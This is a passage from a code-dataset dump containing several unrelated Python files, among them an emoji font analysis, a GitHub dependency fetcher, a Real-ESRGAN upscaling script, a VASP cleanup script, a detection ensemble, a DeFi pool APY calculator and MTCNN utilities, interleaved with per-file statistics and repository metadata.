df = metadata()
sf = (df
.groupby(['api_level'])
.agg({'font_file': 'count', 'file_size': 'sum'}))
sf['file_size'] = sf['file_size'].apply(lambda sz: (sz / pow(2, 20)))
sf.rename(columns = {
'font_file': 'num_files',
'file_size': 'size_MB',
}, inplace=True)
sf['delta_size_MB'] = sf['size_MB'] - sf['size_MB'].shift(1)
sf.reset_index(inplace=True)
return sf
def emoji_detail():
df = emoji_support()
# merge emoji metadata to gain the status column
df = df.merge(emoji.metadata().drop(columns=['emoji_level']),
on='codepoints')
df = df[df['status'] == 'fully-qualified']
df = df.drop(columns='status')
df.supported = df.supported.astype('int32')
df['api_level'] = df.font_file.str.split('/').str[1]
df.api_level = df.api_level.astype('int32')
df['font_file'] = df.font_file.str.split('/').str[2]
return df
def emoji_summary():
df = emoji_detail()
sf = (df.groupby(['font_file', 'api_level', 'emoji_level'])
.agg({'supported': ['sum', 'count']}))
sf.columns = ['supported', 'total']
sf.reset_index(inplace=True)
sf2 = (sf.drop(columns='emoji_level')
.groupby('api_level')
.agg('sum')
.reset_index())
sf2['delta'] = sf2['supported'] - sf2['supported'].shift(1)
sf2.fillna(0, inplace=True)
return sf, sf2
| 27.666667
| 82
| 0.590949
| 517
| 3,403
| 3.746615
| 0.324952
| 0.041301
| 0.023232
| 0.017553
| 0.075374
| 0.021683
| 0
| 0
| 0
| 0
| 0
| 0.055936
| 0.185718
| 3,403
| 122
| 83
| 27.893443
| 0.643089
| 0.063473
| 0
| 0.041667
| 0
| 0
| 0.269437
| 0.007869
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072917
| false
| 0
| 0.041667
| 0.010417
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
133faca593d6fb1ce0fd475b5ad4b709b64db3a7
| 1,970
|
py
|
Python
|
main.py
|
vsundesha/documentation-hub-dependencies
|
3cdb7c28ceefb7c4ece60fd5e9d3e89640bb0d01
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
vsundesha/documentation-hub-dependencies
|
3cdb7c28ceefb7c4ece60fd5e9d3e89640bb0d01
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
vsundesha/documentation-hub-dependencies
|
3cdb7c28ceefb7c4ece60fd5e9d3e89640bb0d01
|
[
"Apache-2.0"
] | null | null | null |
import config as props
import sys
import getopt
from GitHubDataFetcher import GitHubDataFetcher
from DependencyFile import DependencyFile
from ErrorFile import ErrorFile
# Github Token
TOKEN = props.token
OWNER = ""
REPOSITORY = ""
OUTPUTFILE = ""
def showHelp():
print('-r or --repo The name of the github repository')
print('-o or --owner The owner of the github repository')
print('-f or --outputfile (Optional) (Default : <OWNER+REPONAME>dependecies.json) \
The output file')
def main(argv):
global OWNER, REPOSITORY, OUTPUTFILE
try:
        # opts holds the parsed options; remainder holds any leftover
        # arguments that getopt could not match
opts, remainder = getopt.getopt(
argv, "hr:o:f:", ["repo=", "owner=", "outputfile="])
except getopt.GetoptError:
showHelp()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
showHelp()
sys.exit()
elif opt in ("-r", "--repo"):
REPOSITORY = arg
elif opt in ("-o", "--owner"):
OWNER = arg
elif opt in ("-f", "--outputfile"):
OUTPUTFILE = arg
# check if repo and owner are specified
if(OWNER and REPOSITORY):
# create the fetcher
data = GitHubDataFetcher(OWNER, REPOSITORY, TOKEN)
# get the response object
res = data.getInfo()
# response is type ErrorFile or DependencyFile
if(isinstance(res, DependencyFile)):
if(OUTPUTFILE):
output = OUTPUTFILE+"dependecies.json"
else:
output = OWNER+REPOSITORY+"dependecies.json"
elif(isinstance(res, ErrorFile)):
output = "error.json"
# write file
res.toJson(output)
else:
print("--repo and --owner arguments are mandatory")
if __name__ == "__main__":
main(sys.argv[1:])
| 30.78125
| 117
| 0.579695
| 214
| 1,970
| 5.299065
| 0.38785
| 0.05291
| 0.02381
| 0.037037
| 0.045855
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001485
| 0.316244
| 1,970
| 63
| 118
| 31.269841
| 0.840386
| 0.129949
| 0
| 0.083333
| 0
| 0.020833
| 0.152161
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.125
| 0
| 0.166667
| 0.083333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
133fae22a7b7ebcd7d6ca9fc3157fb56fb5b1062
| 6,036
|
py
|
Python
|
inference_realesrgan.py
|
blabra/Real-ESRGAN
|
bd5c69d2ef30f27cc2a510443451a2dc841aec28
|
[
"BSD-3-Clause"
] | null | null | null |
inference_realesrgan.py
|
blabra/Real-ESRGAN
|
bd5c69d2ef30f27cc2a510443451a2dc841aec28
|
[
"BSD-3-Clause"
] | null | null | null |
inference_realesrgan.py
|
blabra/Real-ESRGAN
|
bd5c69d2ef30f27cc2a510443451a2dc841aec28
|
[
"BSD-3-Clause"
] | null | null | null |
import argparse
import cv2
import glob
import os
from basicsr.archs.rrdbnet_arch import RRDBNet
import time
from realesrgan import RealESRGANer
from realesrgan.archs.srvgg_arch import SRVGGNetCompact
def main():
"""Inference demo for Real-ESRGAN.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input', type=str, default='inputs', help='Input image or folder')
parser.add_argument(
'-n',
'--model_name',
type=str,
default='RealESRGAN_x4plus',
help=('Model names: RealESRGAN_x4plus | RealESRNet_x4plus | RealESRGAN_x4plus_anime_6B | RealESRGAN_x2plus'
'RealESRGANv2-anime-xsx2 | RealESRGANv2-animevideo-xsx2-nousm | RealESRGANv2-animevideo-xsx2'
'RealESRGANv2-anime-xsx4 | RealESRGANv2-animevideo-xsx4-nousm | RealESRGANv2-animevideo-xsx4'))
parser.add_argument('-o', '--output', type=str, default='results', help='Output folder')
parser.add_argument('-s', '--outscale', type=float, default=4, help='The final upsampling scale of the image')
parser.add_argument('--suffix', type=str, default='Realesrgan-4x', help='Suffix of the restored image')
parser.add_argument('-t', '--tile', type=int, default=0, help='Tile size, 0 for no tile during testing')
parser.add_argument('--tile_pad', type=int, default=10, help='Tile padding')
parser.add_argument('--pre_pad', type=int, default=0, help='Pre padding size at each border')
parser.add_argument('--face_enhance', action='store_true', help='Use GFPGAN to enhance face')
parser.add_argument('--half', action='store_true', help='Use half precision during inference')
parser.add_argument(
'--alpha_upsampler',
type=str,
default='realesrgan',
help='The upsampler for the alpha channels. Options: realesrgan | bicubic')
parser.add_argument(
'--ext',
type=str,
default='auto',
help='Image extension. Options: auto | jpg | png, auto means using the same extension as inputs')
args = parser.parse_args()
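    # Illustrative invocation:
    #   python inference_realesrgan.py -i inputs -n RealESRGAN_x4plus -s 4 --half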
# determine models according to model names
args.model_name = args.model_name.split('.')[0]
if args.model_name in ['RealESRGAN_x4plus', 'RealESRNet_x4plus']: # x4 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x4plus_anime_6B']: # x4 RRDBNet model with 6 blocks
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x2plus']: # x2 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2)
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx2', 'RealESRGANv2-animevideo-xsx2-nousm', 'RealESRGANv2-animevideo-xsx2'
]: # x2 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=2, act_type='prelu')
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx4', 'RealESRGANv2-animevideo-xsx4-nousm', 'RealESRGANv2-animevideo-xsx4'
]: # x4 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu')
netscale = 4
else:
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
# determine model paths
model_path = os.path.join('experiments/pretrained_models', args.model_name + '.pth')
if not os.path.isfile(model_path):
model_path = os.path.join('realesrgan/weights', args.model_name + '.pth')
if not os.path.isfile(model_path):
raise ValueError(f'Model {args.model_name} does not exist.')
# restorer
upsampler = RealESRGANer(
scale=netscale,
model_path=model_path,
model=model,
tile=args.tile,
tile_pad=args.tile_pad,
pre_pad=args.pre_pad,
half=args.half)
if args.face_enhance: # Use GFPGAN for face enhancement
from gfpgan import GFPGANer
face_enhancer = GFPGANer(
model_path='https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth',
upscale=args.outscale,
arch='clean',
channel_multiplier=2,
bg_upsampler=upsampler)
os.makedirs(args.output, exist_ok=True)
if os.path.isfile(args.input):
paths = [args.input]
else:
paths = sorted(glob.glob(os.path.join(args.input, '*')))
for idx, path in enumerate(paths):
startTime = time.perf_counter()
imgname, extension = os.path.splitext(os.path.basename(path))
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
if len(img.shape) == 3 and img.shape[2] == 4:
img_mode = 'RGBA'
else:
img_mode = None
if args.ext == 'auto':
extension = "png"
else:
extension = args.ext
if img_mode == 'RGBA': # RGBA images should be saved in png format
extension = 'png'
save_path = os.path.join(args.output, f'{imgname}-{args.suffix}.{extension}')
if os.path.exists(save_path):
continue
try:
if args.face_enhance:
_, _, output = face_enhancer.enhance(img, has_aligned=False, only_center_face=False, paste_back=True)
else:
output, _ = upsampler.enhance(img, outscale=args.outscale)
except RuntimeError as error:
print('Error', error)
print('If you encounter CUDA out of memory, try to set --tile with a smaller number.')
else:
cv2.imwrite(save_path, output)
print(f'NO.{idx}, {imgname} is done, used {round((time.perf_counter() - startTime), 4)} seconds')
if __name__ == '__main__':
main()
| 43.73913
| 117
| 0.647614
| 803
| 6,036
| 4.701121
| 0.280199
| 0.028609
| 0.05404
| 0.012715
| 0.301192
| 0.269404
| 0.259603
| 0.259603
| 0.259603
| 0.244768
| 0
| 0.025161
| 0.229622
| 6,036
| 137
| 118
| 44.058394
| 0.786667
| 0.050862
| 0
| 0.239316
| 0
| 0.017094
| 0.272139
| 0.084529
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008547
| false
| 0
| 0.076923
| 0
| 0.08547
| 0.025641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1340144aae426a1da982a7084f1832cdca8e0a63
| 515
|
py
|
Python
|
examples/Fe__vasp/Fe_fcc_afm_D/Fe_fcc_afm_D_vac_A/clean_vasp.py
|
eragasa/pypospack
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
[
"MIT"
] | 4
|
2018-01-18T19:59:56.000Z
|
2020-08-25T11:56:52.000Z
|
examples/Fe__vasp/Fe_fcc_afm_D/Fe_fcc_afm_D_vac_A/clean_vasp.py
|
eragasa/pypospack
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
[
"MIT"
] | 1
|
2018-04-22T23:02:13.000Z
|
2018-04-22T23:02:13.000Z
|
examples/Fe__vasp/Fe_fcc_afm_D/Fe_fcc_afm_D_vac_A/clean_vasp.py
|
eragasa/pypospack
|
21cdecaf3b05c87acc532d992be2c04d85bfbc22
|
[
"MIT"
] | 1
|
2019-09-14T07:04:42.000Z
|
2019-09-14T07:04:42.000Z
|
import os
filenames_delete = [
'CHG',
'CHGCAR',
'CONTCAR',
'DOSCAR',
'EIGENVAL',
'IBZKPT',
'job.err',
'job.out',
'OSZICAR',
'PCDAT',
'REPORT',
'vasp.log',
'vasprun.xml',
'WAVECAR',
'XDATCAR'
]
for filename in filenames_delete:
try:
os.remove(filename)
msg = "{} removed.".format(filename)
except FileNotFoundError as e:
msg = "{} does not exist.".format(filename)
except:
raise
print(msg)
| 17.166667
| 51
| 0.518447
| 50
| 515
| 5.3
| 0.78
| 0.113208
| 0.150943
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.330097
| 515
| 29
| 52
| 17.758621
| 0.768116
| 0
| 0
| 0
| 0
| 0
| 0.252427
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.037037
| 0.037037
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1340c125093f2e5f053bbf9519f4a5c3e3aa6a2e
| 1,195
|
py
|
Python
|
binary_trees/largest_values_in_tree_rows.py
|
ethyl2/code_challenges
|
3c9ccca1782f92728e60a515a7ca797f6d470e81
|
[
"MIT"
] | null | null | null |
binary_trees/largest_values_in_tree_rows.py
|
ethyl2/code_challenges
|
3c9ccca1782f92728e60a515a7ca797f6d470e81
|
[
"MIT"
] | null | null | null |
binary_trees/largest_values_in_tree_rows.py
|
ethyl2/code_challenges
|
3c9ccca1782f92728e60a515a7ca797f6d470e81
|
[
"MIT"
] | null | null | null |
'''
Sean Chen's solution.
See mine in largest_values_in_each_row.py
'''
from collections import deque
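# Illustrative example (assumed tree): a root 1 with children 3 and 2, where 2
# has a child 5, yields [1, 3, 5] -- the largest value in each row.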
def largest_values_in_tree_rows(t):
rv = []
if t is None:
return rv
current_depth = 0
current_max = t.value
q = deque()
# add the root node to the queue at a depth of 0
q.append((t, current_depth))
while len(q) > 0:
node, depth = q.popleft()
# if the depth of the current node is different from
        # `current_depth`, add `current_max` to `rv` and then
# reset `current_max` and `current_depth`
if depth != current_depth:
rv.append(current_max)
current_max = node.value
current_depth = depth
# otherwise, we update `current_max` if we need to
else:
current_max = max(node.value, current_max)
# add the left and right children of the current node
# to the queue, along with their depths
if node.left:
q.append((node.left, depth + 1))
if node.right:
q.append((node.right, depth + 1))
# don't forget to append the last `current_max`
rv.append(current_max)
return rv
| 24.895833
| 61
| 0.594979
| 172
| 1,195
| 3.994186
| 0.372093
| 0.14556
| 0.043668
| 0.040757
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006158
| 0.320502
| 1,195
| 47
| 62
| 25.425532
| 0.839901
| 0.366527
| 0
| 0.173913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.043478
| 0
| 0.173913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13422bb3478f929cfdd7d39790b4b35df0ba961e
| 7,034
|
py
|
Python
|
src/infer/_ExtractSimpleDeformTTA.py
|
RamsteinWR/PneumoniaRSNA1
|
08bdba51292307a78ef711c6be4a63faea240ddf
|
[
"MIT"
] | null | null | null |
src/infer/_ExtractSimpleDeformTTA.py
|
RamsteinWR/PneumoniaRSNA1
|
08bdba51292307a78ef711c6be4a63faea240ddf
|
[
"MIT"
] | null | null | null |
src/infer/_ExtractSimpleDeformTTA.py
|
RamsteinWR/PneumoniaRSNA1
|
08bdba51292307a78ef711c6be4a63faea240ddf
|
[
"MIT"
] | null | null | null |
import json
import os
import re
import numpy as np
import pandas as pd
from src.infer.ExtractDeformableTTA import MAPPINGS_PATH, test_image_set, METADATA_PATH, RCNN0_DETS_DIR
WDIR = os.path.dirname(os.path.abspath(__file__))
def get_results(det_folder, test_set, suffix):
filepath = os.path.join(det_folder, test_set, "results/detections_{}_results_{}.json".format(test_set, suffix))
with open(filepath) as f:
return json.load(f)
def flip_box(box):
"""
box (list, length 4): [x1, y1, w, h]
"""
# Get top right corner of prediction
x1 = box[0]
y1 = box[1]
w = box[2]
h = box[3]
topRight = (x1 + w, y1)
# Top left corner of flipped box is:
newTopLeft = (1024. - topRight[0], topRight[1])
return [newTopLeft[0], newTopLeft[1], w, h]
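# Illustrative example: flip_box([100, 50, 200, 80]) -> [724.0, 50, 200, 80]
# (horizontal flip on a 1024-pixel-wide image).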
def convert_dict_to_df(results, mapping, metadata, test_set, flip=False, threshold=0.):
list_of_image_ids = []
list_of_scores = []
list_of_bboxes = []
for res in results:
coco_image_id = res["image_id"]
coco_img_file = "COCO_{}_{}.png".format(test_set, str(coco_image_id).zfill(12))
list_of_image_ids.append(mapping[coco_img_file])
list_of_scores.append(res["score"])
list_of_bboxes.append(res["bbox"])
if flip:
list_of_bboxes = [flip_box(_) for _ in list_of_bboxes]
results_df = pd.DataFrame({"patientId": [pid.split(".")[0] for pid in list_of_image_ids],
"score": list_of_scores,
"x": [box[0] for box in list_of_bboxes],
"y": [box[1] for box in list_of_bboxes],
"w": [box[2] for box in list_of_bboxes],
"h": [box[3] for box in list_of_bboxes],
"bbox": list_of_bboxes})
results_df = results_df.sort_values(["patientId", "score"], ascending=False)
results_df = results_df[results_df.score >= threshold]
results_df = results_df.merge(metadata, on="patientId", how="left")
return results_df[["patientId", "score", "x", "y", "w", "h", "bbox", "view"]]
with open(MAPPINGS_PATH) as f:
mapping = json.load(f)
with open(MAPPINGS_PATH.replace(test_image_set, "{}_flip".format(test_image_set))) as f:
flip_mapping = json.load(f)
metadata = pd.read_csv(METADATA_PATH)
def get_TTA_results(fold_imsize, test_image_set, MAIN_DIR):
TTAs = []
for test_set in [test_image_set, "{}_flip".format(test_image_set)]:
for suffix in ["original", "scale080", "scale120"]:
            tmp_results = get_results(os.path.join(MAIN_DIR, "peepin_{}".format(fold_imsize)),
test_set=test_set, suffix=suffix)
if re.search("_flip", test_set):
tmp_df = convert_dict_to_df(tmp_results,
flip_mapping,
metadata,
test_set=test_set,
flip=True,
threshold=0.01)
else:
tmp_df = convert_dict_to_df(tmp_results,
mapping,
metadata,
test_set=test_set,
flip=False,
threshold=0.01)
TTAs.append(tmp_df)
return TTAs
execfile(os.path.join(WDIR, "DetectionEnsemble.py"))
def run_ensemble(list_of_dfs, metadata, adjust_score=True):
list_of_pids = []
list_of_ensemble_bboxes = []
for pid in np.unique(metadata.patientId):
list_of_tmp_dfs = []
list_of_detections = []
view = metadata[metadata.patientId == pid]["view"].iloc[0]
for df_index, each_df in enumerate(list_of_dfs):
tmp_df = each_df[each_df.patientId == pid]
list_of_bboxes = []
for rownum, row in tmp_df.iterrows():
bbox = row.bbox
bbox.append(1)
bbox.append(row.score)
list_of_bboxes.append(bbox)
list_of_detections.append(list_of_bboxes)
from src.infer.DetectionEnsemble import GeneralEnsemble
list_of_ensemble_bboxes.append(GeneralEnsemble(list_of_detections, iou_thresh=0.4))
list_of_pids.append(pid)
# Create new DataFrame
list_of_new_pids = []
list_of_bboxes = []
for i, ensemble_bboxes in enumerate(list_of_ensemble_bboxes):
for bbox in ensemble_bboxes:
list_of_new_pids.append(list_of_pids[i])
list_of_bboxes.append(bbox)
ensemble_bbox_df = pd.DataFrame({"patientId": list_of_new_pids,
"x": [box[0] for box in list_of_bboxes],
"y": [box[1] for box in list_of_bboxes],
"w": [box[2] for box in list_of_bboxes],
"h": [box[3] for box in list_of_bboxes],
"score": [box[5] for box in list_of_bboxes],
"votes": [box[-1] for box in list_of_bboxes],
"bbox": list_of_bboxes})
if adjust_score:
ensemble_bbox_df["score"] = ensemble_bbox_df.score * ensemble_bbox_df.votes
return ensemble_bbox_df
imsizes = [224, 256, 288, 320, 352, 384, 416, 448, 480, 512]
fold0_nom = "fold{}_{}".format(0, imsizes[0])
fold1_nom = "fold{}_{}".format(1, imsizes[1])
fold2_nom = "fold{}_{}".format(2, imsizes[2])
fold3_nom = "fold{}_{}".format(3, imsizes[3])
fold4_nom = "fold{}_{}".format(4, imsizes[4])
fold5_nom = "fold{}_{}".format(5, imsizes[5])
fold6_nom = "fold{}_{}".format(6, imsizes[6])
fold7_nom = "fold{}_{}".format(7, imsizes[7])
fold8_nom = "fold{}_{}".format(8, imsizes[8])
fold9_nom = "fold{}_{}".format(9, imsizes[9])
fold1RCNN0 = run_ensemble(get_TTA_results("fold1_256", test_image_set, RCNN0_DETS_DIR.format(fold1_nom)), metadata)
fold3RCNN0 = run_ensemble(get_TTA_results("fold3_320", test_image_set, RCNN0_DETS_DIR.format(fold3_nom)), metadata)
fold5RCNN0 = run_ensemble(get_TTA_results("fold5_384", test_image_set, RCNN0_DETS_DIR.format(fold5_nom)), metadata)
fold7RCNN0 = run_ensemble(get_TTA_results("fold7_448", test_image_set, RCNN0_DETS_DIR.format(fold7_nom)), metadata)
fold9RCNN0 = run_ensemble(get_TTA_results("fold9_512", test_image_set, RCNN0_DETS_DIR.format(fold9_nom)), metadata)
list_of_dfs = [fold1RCNN0, fold3RCNN0, fold5RCNN0, fold7RCNN0, fold9RCNN0]
final_TTA_ensemble = run_ensemble(list_of_dfs, metadata, adjust_score=False)
final_TTA_ensemble["adjustedScore"] = final_TTA_ensemble.score * final_TTA_ensemble.votes
final_TTA_ensemble = final_TTA_ensemble[["patientId", "x", "y", "w", "h", "score", "votes", "adjustedScore"]]
final_TTA_ensemble.to_csv(os.path.join(WDIR, "../../SimpleDCNPredictions.csv"), index=False)
| 44.238994
| 115
| 0.598806
| 918
| 7,034
| 4.262527
| 0.19281
| 0.067467
| 0.064401
| 0.039356
| 0.277536
| 0.203424
| 0.187835
| 0.132635
| 0.064401
| 0.064401
| 0
| 0.031558
| 0.279215
| 7,034
| 158
| 116
| 44.518987
| 0.740237
| 0.018197
| 0
| 0.181102
| 0
| 0
| 0.067654
| 0.009727
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03937
| false
| 0
| 0.055118
| 0
| 0.133858
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1342626b945cae1f2c60f3de7811ba70848e89f4
| 1,896
|
py
|
Python
|
pool4.py
|
yfii/yfiiapi
|
2c0341b66108f99005dc5a40e3d1d30267f50bb5
|
[
"MIT"
] | 4
|
2020-09-11T12:31:37.000Z
|
2020-12-14T04:42:05.000Z
|
pool4.py
|
yfii/yfiiapi
|
2c0341b66108f99005dc5a40e3d1d30267f50bb5
|
[
"MIT"
] | 1
|
2020-10-07T11:03:07.000Z
|
2020-10-07T11:03:07.000Z
|
pool4.py
|
yfii/yfiiapi
|
2c0341b66108f99005dc5a40e3d1d30267f50bb5
|
[
"MIT"
] | 9
|
2020-09-25T17:54:50.000Z
|
2021-06-05T05:36:14.000Z
|
from web3 import Web3, HTTPProvider
import json
w3url = "https://mainnet.infura.io/v3/998f64f3627548bbaf2630599c1eefca"
w3 = Web3(HTTPProvider(w3url))
WETH = "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2"
YFII = "0xa1d0E215a23d7030842FC67cE582a6aFa3CCaB83"
DAI = "0x6B175474E89094C44Da98b954EedeAC495271d0F"
iUSDT = "0x72Cf258c852Dc485a853370171d46B9D29fD3184"
POOL4 = "0x3d367C9529f260B0661e1C1E91167C9319ee96cA"
yfii2dai = [YFII, WETH, DAI]
with open("abi/erc20.json") as f:
erc20ABI = json.loads(f.read())
with open("abi/uniswapRouterv2.json") as f:
uniswapABI = json.loads(f.read())
with open("abi/pool4.json") as f:
pool4ABI = json.loads(f.read())
uniswap_instance = w3.eth.contract(
abi=uniswapABI,
address=w3.toChecksumAddress("0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D"),
)
pool4_instance = w3.eth.contract(abi=pool4ABI, address=POOL4)
def getyfiiprice():
price = uniswap_instance.functions.getAmountsOut(
w3.toWei(1, "ether"), yfii2dai
).call()[-1]
return float(w3.fromWei(price, "ether"))
def _weekly_reward():
return pool4_instance.functions.rewardRate().call() / 1e18 * 60480
def _totalStakedAmount():
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
return token_instance.functions.balanceOf(POOL4).call() / 1e18
def getDATA():
weekly_reward = (
pool4_instance.functions.rewardRate().call() / 1e6 * 7 * 24 * 60 * 60
)
token_instance = w3.eth.contract(abi=erc20ABI, address=w3.toChecksumAddress(YFII))
totalStakedAmount = token_instance.functions.balanceOf(POOL4).call() / 1e18
YFIIPrice = getyfiiprice()
TVL = totalStakedAmount * YFIIPrice
YFIWeeklyROI = (weekly_reward / TVL) * 100 / 1.01
apy = YFIWeeklyROI * 52
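    # apy is the simple weekly ROI annualised over 52 weeks (no compounding),
    # using the /1.01 adjustment applied to YFIWeeklyROI above.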
return {"apy": apy, "totalStakedAmount": totalStakedAmount, "TVL": TVL}
if __name__ == "__main__":
print(getDATA())
| 29.169231
| 86
| 0.730485
| 200
| 1,896
| 6.815
| 0.395
| 0.062362
| 0.038151
| 0.061629
| 0.287601
| 0.19956
| 0.19956
| 0.098313
| 0.098313
| 0.098313
| 0
| 0.153514
| 0.144515
| 1,896
| 64
| 87
| 29.625
| 0.686806
| 0
| 0
| 0.045455
| 0
| 0
| 0.214135
| 0.14557
| 0
| 0
| 0.132911
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.045455
| 0.022727
| 0.227273
| 0.022727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1345874b0ae4768978973e82f88c986754ca58f9
| 7,109
|
py
|
Python
|
tools/accuracy_checker/openvino/tools/accuracy_checker/evaluators/custom_evaluators/mtcnn_evaluator_utils.py
|
Pandinosaurus/open_model_zoo
|
2543996541346418919c5cddfb71e33e2cdef080
|
[
"Apache-2.0"
] | 1
|
2019-05-31T14:01:42.000Z
|
2019-05-31T14:01:42.000Z
|
tools/accuracy_checker/openvino/tools/accuracy_checker/evaluators/custom_evaluators/mtcnn_evaluator_utils.py
|
Pandinosaurus/open_model_zoo
|
2543996541346418919c5cddfb71e33e2cdef080
|
[
"Apache-2.0"
] | null | null | null |
tools/accuracy_checker/openvino/tools/accuracy_checker/evaluators/custom_evaluators/mtcnn_evaluator_utils.py
|
Pandinosaurus/open_model_zoo
|
2543996541346418919c5cddfb71e33e2cdef080
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import OrderedDict
import cv2
import numpy as np
from ...adapters import MTCNNPAdapter
def calibrate_predictions(previous_stage_predictions, out, threshold, outputs_mapping, iou_type=None):
prob_out = outputs_mapping['probability_out']
if prob_out not in out[0]:
prob_out = prob_out + '/sink_port_0' if '/sink_port_0' not in prob_out else prob_out.replace('/sink_port_0', '')
score = out[0][prob_out][:, 1]
pass_t = np.where(score > 0.7)[0]
removed_boxes = [i for i in range(previous_stage_predictions[0].size) if i not in pass_t]
previous_stage_predictions[0].remove(removed_boxes)
previous_stage_predictions[0].scores = score[pass_t]
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
region_out = outputs_mapping['region_out']
if region_out not in out[0]:
region_out = (
region_out + '/sink_port_0' if '/sink_port_0' not in region_out else region_out.replace('/sink_port_0', '')
)
mv = out[0][region_out][pass_t]
if iou_type:
previous_stage_predictions[0], peek = nms(previous_stage_predictions[0], threshold, iou_type)
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
mv = mv[np.sort(peek).astype(int)]
x_mins, y_mins, x_maxs, y_maxs, _ = bbreg(bboxes, mv.T).T
previous_stage_predictions[0].x_mins = x_mins
previous_stage_predictions[0].y_mins = y_mins
previous_stage_predictions[0].x_maxs = x_maxs
previous_stage_predictions[0].y_maxs = y_maxs
return previous_stage_predictions
def nms(prediction, threshold, iou_type):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
peek = MTCNNPAdapter.nms(bboxes, threshold, iou_type)
prediction.remove([i for i in range(prediction.size) if i not in peek])
